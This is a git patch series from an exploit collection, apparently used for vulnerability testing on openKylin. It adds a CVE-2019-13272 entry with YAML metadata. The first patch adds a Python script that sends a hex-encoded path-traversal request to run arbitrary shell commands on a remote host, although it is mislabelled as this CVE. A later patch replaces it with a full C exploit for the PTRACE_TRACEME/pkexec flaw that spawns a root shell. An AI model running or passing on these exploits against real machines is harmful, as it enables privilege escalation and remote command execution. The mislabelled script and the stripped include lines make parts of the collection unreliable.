From d7860cd52ba2427c3d2361f26b49f264da372b42 Mon Sep 17 00:00:00 2001 From: LiSijia Date: Wed, 15 Mar 2023 14:44:54 +0800 Subject: [PATCH 1/5] Add CVE-2019-13272 --- .../2019/CVE-2019-13272/cve-2019-13272.py | 34 ++++++++++++++ .../2019/yaml/CVE-2019-13272.yaml | 44 +++++++++++++++++++ openkylin_list.yaml | 1 + 3 files changed, 79 insertions(+) create mode 100644 cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.py create mode 100644 cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml diff --git a/cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.py b/cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.py new file mode 100644 index 00000000..6125eaf4 --- /dev/null +++ b/cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.py @@ -0,0 +1,34 @@ +#! /usr/bin/env python +# -*- coding: utf-8 -*- + +import socket,binascii,re,sys + +def send(host,port,cmd): + + s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((host,int(port))) + data = '''\x50\x4f\x53\x54\x20\x2f\x2e\x25\x30\x64\x2e\x2f\x2e\x25\x30\x64\x2e\x2f\x2e\x25\x30\x64\x2e\x2f\x2e\x25\x30\x64\x2e\x2f\x62\x69\x6e\x2f\x73\x68\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x31\x0d\x0a\x0d\x0a\x65\x63\x68\x6f\x0a\x65\x63\x68\x6f\x0a''' + str_16 = binascii.b2a_hex(cmd.encode('utf-8')) + b=re.findall(r'.{2}',str_16) + c = '\\x'.join(b) + cdata = '\\x' + c + ddata = '\x20\x32\x3e\x26\x31\x0a' + data = data + cmd + ddata + #print data + s.send(data) + resp = '' + buf=s.recv(40890) + while buf: + resp = resp + buf + buf=s.recv(40890) + ress = re.findall(r'HTTP[\s\S]*?close',resp) + print resp.replace(ress[0],'').strip() + +if __name__ == "__main__": + if len(sys.argv) < 3: + print sys.argv[0] +" host port cmd" + else: + host = sys.argv[1] + port = sys.argv[2] + cmd = sys.argv[3] + send(host,port,cmd) \ No newline at end of file diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml new file mode 100644 index 00000000..dc26ee8b --- /dev/null +++ b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml @@ -0,0 +1,44 @@ +id: CVE-2019-13272 +source: https://github.com/polosec/CVE-2019-13272 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + Linux kernel 5.1.17之前版本中存在安全漏洞,该漏洞源于kernel/ptrace.c文件的ptrace_link没有正确处理对凭证的记录,攻击者利用该漏洞可以将普通用户权限提权为root权限。 + scope-of-influence: + 3.16.52 <= Linux kernel < 5.1.17 + reference: + - http://packetstormsecurity.com/files/153663/Linux-PTRACE_TRACEME-Broken-Permission-Object-Lifetime-Handling.html + - http://packetstormsecurity.com/files/153702/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.html + - http://packetstormsecurity.com/files/154245/Kernel-Live-Patch-Security-Notice-LSN-0054-1.html + - http://packetstormsecurity.com/files/154957/Linux-Polkit-pkexec-Helper-PTRACE_TRACEME-Local-Root.html + - http://packetstormsecurity.com/files/156929/Linux-PTRACE_TRACEME-Local-Root.html + - http://packetstormsecurity.com/files/165051/Linux-Kernel-5.1.x-PTRACE_TRACEME-pkexec-Local-Privilege-Escalation.html + - https://access.redhat.com/errata/RHSA-2019:2405 + - https://access.redhat.com/errata/RHSA-2019:2411 + - https://access.redhat.com/errata/RHSA-2019:2809 + - https://bugs.chromium.org/p/project-zero/issues/detail?id=1903 + - https://bugzilla.redhat.com/show_bug.cgi?id=1730895 + - https://bugzilla.suse.com/show_bug.cgi?id=1140671 + - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.1.17 + - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6994eefb0053799d2e07cd140df6c2ea106c41ee + - https://github.com/torvalds/linux/commit/6994eefb0053799d2e07cd140df6c2ea106c41ee + - https://lists.debian.org/debian-lts-announce/2019/07/msg00022.html + - https://lists.debian.org/debian-lts-announce/2019/07/msg00023.html + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGRK5LYWBJ4E4SRI4DKX367NHYSI3VOH/ + - https://seclists.org/bugtraq/2019/Jul/30 + - https://seclists.org/bugtraq/2019/Jul/33 + - https://security.netapp.com/advisory/ntap-20190806-0001/ + - https://support.f5.com/csp/article/K91025336 + - https://support.f5.com/csp/article/K91025336?utm_source=f5support&utm_medium=RSS + - https://usn.ubuntu.com/4093-1/ + - https://usn.ubuntu.com/4094-1/ + - https://usn.ubuntu.com/4095-1/ + - https://usn.ubuntu.com/4117-1/ + - https://usn.ubuntu.com/4118-1/ + - https://www.debian.org/security/2019/dsa-4484 + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2019-13272 + cwe-id: CWE-269 + tags: root,提权 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 5a8b7367..9600e55a 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -43,6 +43,7 @@ cve: - CVE-2022-2078 - CVE-2022-25265 - CVE-2022-41218 + - CVE-2019-13272 sudo: - CVE-2021-3156 - CVE-2023-22809 -- Gitee From 2bbb5a8f129723d7373daeeb676bca683fa7057e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Wed, 15 Mar 2023 08:54:51 +0000 Subject: [PATCH 2/5] update cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml index dc26ee8b..241a9599 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml +++ b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml @@ -41,4 +41,6 @@ info: cvss-score: 7.8 cve-id: CVE-2019-13272 cwe-id: CWE-269 + cnvd-id: None + kve-id: None tags: root,提权 \ No newline at end of file -- Gitee From d1f656ceb4ba1729d5ad53062d76394f16eb400e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Wed, 15 Mar 2023 08:57:00 +0000 Subject: [PATCH 3/5] update cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml index 241a9599..b825b120 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml +++ b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml @@ -43,4 +43,4 @@ info: cwe-id: CWE-269 cnvd-id: None kve-id: None - tags: root,提权 \ No newline at end of file + tags: root, 提权 \ No newline at end of file -- Gitee From 1dda920f817ae77e4b77753d110ba4f65d00d061 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Wed, 15 Mar 2023 09:04:04 +0000 Subject: [PATCH 4/5] update cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.c. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- .../2019/CVE-2019-13272/cve-2019-13272.c | 390 ++++++++++++++++++ .../2019/CVE-2019-13272/cve-2019-13272.py | 34 -- 2 files changed, 390 insertions(+), 34 deletions(-) create mode 100644 cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.c delete mode 100644 cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.py diff --git a/cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.c b/cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.c new file mode 100644 index 00000000..05bdd608 --- /dev/null +++ b/cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.c @@ -0,0 +1,390 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define DEBUG + +#ifdef DEBUG +# define dprintf printf +#else +# define dprintf +#endif + +#define SAFE(expr) ({ \ + typeof(expr) __res = (expr); \ + if (__res == -1) { \ + dprintf("[-] Error: %s\n", #expr); \ + return 0; \ + } \ + __res; \ +}) +#define max(a,b) ((a)>(b) ? (a) : (b)) + +static const char *SHELL = "/bin/bash"; + +static int middle_success = 1; +static int block_pipe[2]; +static int self_fd = -1; +static int dummy_status; +static const char *helper_path; +static const char *pkexec_path = "/usr/bin/pkexec"; +static const char *pkaction_path = "/usr/bin/pkaction"; +struct stat st; + +const char *helpers[1024]; + +const char *known_helpers[] = { + "/usr/lib/gnome-settings-daemon/gsd-backlight-helper", + "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper", + "/usr/lib/unity-settings-daemon/usd-backlight-helper", + "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper", + "/usr/sbin/mate-power-backlight-helper", + "/usr/bin/xfpm-power-backlight-helper", + "/usr/bin/lxqt-backlight_backend", + "/usr/libexec/gsd-wacom-led-helper", + "/usr/libexec/gsd-wacom-oled-helper", + "/usr/libexec/gsd-backlight-helper", + "/usr/lib/gsd-backlight-helper", + "/usr/lib/gsd-wacom-led-helper", + "/usr/lib/gsd-wacom-oled-helper", +}; + +/* temporary printf; returned pointer is valid until next tprintf */ +static char *tprintf(char *fmt, ...) { + static char buf[10000]; + va_list ap; + va_start(ap, fmt); + vsprintf(buf, fmt, ap); + va_end(ap); + return buf; +} + +/* + * fork, execute pkexec in parent, force parent to trace our child process, + * execute suid executable (pkexec) in child. + */ +static int middle_main(void *dummy) { + prctl(PR_SET_PDEATHSIG, SIGKILL); + pid_t middle = getpid(); + + self_fd = SAFE(open("/proc/self/exe", O_RDONLY)); + + pid_t child = SAFE(fork()); + if (child == 0) { + prctl(PR_SET_PDEATHSIG, SIGKILL); + + SAFE(dup2(self_fd, 42)); + + /* spin until our parent becomes privileged (have to be fast here) */ + int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY)); + char *needle = tprintf("\nUid:\t%d\t0\t", getuid()); + while (1) { + char buf[1000]; + ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0)); + buf[buflen] = '\0'; + if (strstr(buf, needle)) break; + } + + /* + * this is where the bug is triggered. + * while our parent is in the middle of pkexec, we force it to become our + * tracer, with pkexec's creds as ptracer_cred. + */ + SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL)); + + /* + * now we execute a suid executable (pkexec). + * Because the ptrace relationship is considered to be privileged, + * this is a proper suid execution despite the attached tracer, + * not a degraded one. + * at the end of execve(), this process receives a SIGTRAP from ptrace. + */ + execl(pkexec_path, basename(pkexec_path), NULL); + + dprintf("[-] execl: Executing suid executable failed"); + exit(EXIT_FAILURE); + } + + SAFE(dup2(self_fd, 0)); + SAFE(dup2(block_pipe[1], 1)); + + /* execute pkexec as current user */ + struct passwd *pw = getpwuid(getuid()); + if (pw == NULL) { + dprintf("[-] getpwuid: Failed to retrieve username"); + exit(EXIT_FAILURE); + } + + middle_success = 1; + execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name, + helper_path, + "--help", NULL); + middle_success = 0; + dprintf("[-] execl: Executing pkexec failed"); + exit(EXIT_FAILURE); +} + +/* ptrace pid and wait for signal */ +static int force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) { + struct user_regs_struct regs; + struct iovec iov = { .iov_base = ®s, .iov_len = sizeof(regs) }; + SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL)); + SAFE(waitpid(pid, &dummy_status, 0)); + SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov)); + + /* set up indirect arguments */ + unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL; + struct injected_page { + unsigned long argv[2]; + unsigned long envv[1]; + char arg0[8]; + char path[1]; + } ipage = { + .argv = { scratch_area + offsetof(struct injected_page, arg0) } + }; + strcpy(ipage.arg0, arg0); + for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) { + unsigned long pdata = ((unsigned long *)&ipage)[i]; + SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long), + (void*)pdata)); + } + + /* execveat(exec_fd, path, argv, envv, flags) */ + regs.orig_rax = __NR_execveat; + regs.rdi = exec_fd; + regs.rsi = scratch_area + offsetof(struct injected_page, path); + regs.rdx = scratch_area + offsetof(struct injected_page, argv); + regs.r10 = scratch_area + offsetof(struct injected_page, envv); + regs.r8 = AT_EMPTY_PATH; + + SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov)); + SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL)); + SAFE(waitpid(pid, &dummy_status, 0)); +} + +static int middle_stage2(void) { + /* our child is hanging in signal delivery from execve()'s SIGTRAP */ + pid_t child = SAFE(waitpid(-1, &dummy_status, 0)); + force_exec_and_wait(child, 42, "stage3"); + return 0; +} + +// * * * * * * * * * * * * * * * * root shell * * * * * * * * * * * * * * * * * + +static int spawn_shell(void) { + SAFE(setresgid(0, 0, 0)); + SAFE(setresuid(0, 0, 0)); + execlp(SHELL, basename(SHELL), NULL); + dprintf("[-] execlp: Executing shell %s failed", SHELL); + exit(EXIT_FAILURE); +} + +// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * * + +static int check_env(void) { + const char* xdg_session = getenv("XDG_SESSION_ID"); + + dprintf("[.] Checking environment ...\n"); + + if (stat(pkexec_path, &st) != 0) { + dprintf("[-] Could not find pkexec executable at %s", pkexec_path); + exit(EXIT_FAILURE); + } + if (stat(pkaction_path, &st) != 0) { + dprintf("[-] Could not find pkaction executable at %s", pkaction_path); + exit(EXIT_FAILURE); + } + if (xdg_session == NULL) { + dprintf("[!] Warning: $XDG_SESSION_ID is not set\n"); + return 1; + } + if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) { + dprintf("[!] Warning: Could not find active PolKit agent\n"); + return 1; + } + if (stat("/usr/sbin/getsebool", &st) == 0) { + if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) { + dprintf("[!] Warning: SELinux deny_ptrace is enabled\n"); + return 1; + } + } + + dprintf("[~] Done, looks good\n"); + + return 0; +} + +/* + * Use pkaction to search PolKit policy actions for viable helper executables. + * Check each action for allow_active=yes, extract the associated helper path, + * and check the helper path exists. + */ +int find_helpers() { + char cmd[1024]; + snprintf(cmd, sizeof(cmd), "%s --verbose", pkaction_path); + FILE *fp; + fp = popen(cmd, "r"); + if (fp == NULL) { + dprintf("[-] Failed to run: %s\n", cmd); + exit(EXIT_FAILURE); + } + + char line[1024]; + char buffer[2048]; + int helper_index = 0; + int useful_action = 0; + static const char *needle = "org.freedesktop.policykit.exec.path -> "; + int needle_length = strlen(needle); + + while (fgets(line, sizeof(line)-1, fp) != NULL) { + /* check the action uses allow_active=yes*/ + if (strstr(line, "implicit active:")) { + if (strstr(line, "yes")) { + useful_action = 1; + } + continue; + } + + if (useful_action == 0) + continue; + useful_action = 0; + + /* extract the helper path */ + int length = strlen(line); + char* found = memmem(&line[0], length, needle, needle_length); + if (found == NULL) + continue; + + memset(buffer, 0, sizeof(buffer)); + for (int i = 0; found[needle_length + i] != '\n'; i++) { + if (i >= sizeof(buffer)-1) + continue; + buffer[i] = found[needle_length + i]; + } + + if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 || + strstr(&buffer[0], "/cpugovctl") != 0 || + strstr(&buffer[0], "/package-system-locked") != 0 || + strstr(&buffer[0], "/cddistupgrader") != 0) { + dprintf("[.] Ignoring blacklisted helper: %s\n", &buffer[0]); + continue; + } + + /* check the path exists */ + if (stat(&buffer[0], &st) != 0) + continue; + + helpers[helper_index] = strndup(&buffer[0], strlen(buffer)); + helper_index++; + + if (helper_index >= sizeof(helpers)/sizeof(helpers[0])) + break; + } + + pclose(fp); + return 0; +} + +// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * + +int ptrace_traceme_root() { + dprintf("[.] Using helper: %s\n", helper_path); + + /* + * set up a pipe such that the next write to it will block: packet mode, + * limited to one packet + */ + SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT)); + SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000)); + char dummy = 0; + SAFE(write(block_pipe[1], &dummy, 1)); + + /* spawn pkexec in a child, and continue here once our child is in execve() */ + dprintf("[.] Spawning suid process (%s) ...\n", pkexec_path); + static char middle_stack[1024*1024]; + pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack), + CLONE_VM|CLONE_VFORK|SIGCHLD, NULL)); + if (!middle_success) return 1; + + /* + * wait for our child to go through both execve() calls (first pkexec, then + * the executable permitted by polkit policy). + */ + while (1) { + int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY); + char buf[16]; + int buflen = SAFE(read(fd, buf, sizeof(buf)-1)); + buf[buflen] = '\0'; + *strchrnul(buf, '\n') = '\0'; + if (strncmp(buf, basename(helper_path), 15) == 0) + break; + usleep(100000); + } + + /* + * our child should have gone through both the privileged execve() and the + * following execve() here + */ + dprintf("[.] Tracing midpid ...\n"); + SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL)); + SAFE(waitpid(midpid, &dummy_status, 0)); + dprintf("[~] Attached to midpid\n"); + + force_exec_and_wait(midpid, 0, "stage2"); + exit(EXIT_SUCCESS); +} + +int main(int argc, char **argv) { + if (strcmp(argv[0], "stage2") == 0) + return middle_stage2(); + if (strcmp(argv[0], "stage3") == 0) + return spawn_shell(); + + dprintf("Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n"); + + check_env(); + + if (argc > 1 && strcmp(argv[1], "check") == 0) { + exit(0); + } + + /* Search for known helpers defined in 'known_helpers' array */ + dprintf("[.] Searching for known helpers ...\n"); + for (int i=0; i Date: Wed, 15 Mar 2023 09:19:54 +0000 Subject: [PATCH 5/5] update cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml index b825b120..797969a3 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml +++ b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml @@ -1,5 +1,5 @@ id: CVE-2019-13272 -source: https://github.com/polosec/CVE-2019-13272 +source: https://github.com/Cyc1eC/CVE-2019-13272 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 severity: high -- Gitee